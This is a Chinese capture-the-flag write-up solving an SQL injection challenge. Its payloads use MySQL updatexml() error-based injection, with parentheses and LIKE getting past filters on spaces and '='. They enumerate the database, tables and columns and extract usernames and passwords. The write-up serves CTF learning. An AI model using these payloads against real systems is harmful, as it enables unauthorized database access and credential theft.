输入1’

单引号闭合

进行永真式判断

竟然说我是臭弟弟----八嘎（肯定是进行了过滤）
经过手法判断，过滤了=，空格，and等

报错注入updatexml()

报错注入顾名思义就是，通过特殊函数错误使用并使其输出错误结果来获取信息的

UPDATEXML() 是 MySQL 数据库中的一个函数，它用于修改 XML 文档中的值。这个函数返回修改后的 XML 文档，并可以根据指定的 XPath 表达式和新的值来更新 XML 文档中的特定部分。

UPDATEXML() 函数的语法如下：

UPDATEXML(xml_doc, xpath_expr, new_value)
xml_doc：要修改的 XML 文档。
xpath_expr：用于定位要修改的 XML 文档部分的 XPath 表达式。
new_value：要插入到 XML 文档中的新值。

查库

空格用（）绕过
=用like绕过

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

查表

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

查字段

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'--',password))from(H4rDsq1)),0x7e),1))#

只出现一半的flag，使用left和right函数，进行一半一半的查询

1'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#

拼接得到完整的flag

flag{b999a4be-8147-468b-8eba-360a077eaef0}